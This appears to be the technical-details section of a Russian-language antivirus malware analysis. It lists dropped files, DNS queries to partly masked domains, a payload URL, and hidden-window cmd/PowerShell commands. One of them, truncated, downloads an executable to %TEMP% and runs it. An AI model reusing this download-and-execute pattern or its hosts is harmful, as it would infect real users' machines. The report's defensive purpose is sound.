Техническая информация
- $wlmdprk как %temp%\szlywfu.exe
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function jqvscaclum([String] $wlmdprk){(New-Object System.Net.WebClient).DownloadFile($wlmdprk,''%TEMP%\szlywfu.exe'');Start-Process ''%TEMP%\szlywfu.exe'';}try{jqv...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1924
- %TEMP%\rguuyhmbc.bat
- %TEMP%\1145452.cvr
- 'ba####rkjerseys.com':80
- http://ba####rkjerseys.com/bo.bin
- DNS ASK ba####rkjerseys.com
- DNS ASK as####parels.com
- '<SYSTEM32>\cmd.exe' /c PowerShell "'PowerShell ""function jqvscaclum([String] $wlmdprk){(New-Object System.Net.WebClient).DownloadFile($wlmdprk,''%TEMP%\szlywfu.exe'');Start-Process ''%TEMP%\szlywfu.exe'';}try{jqv...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Rguuyhmbc.bat" "' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\Rguuyhmbc.bat" "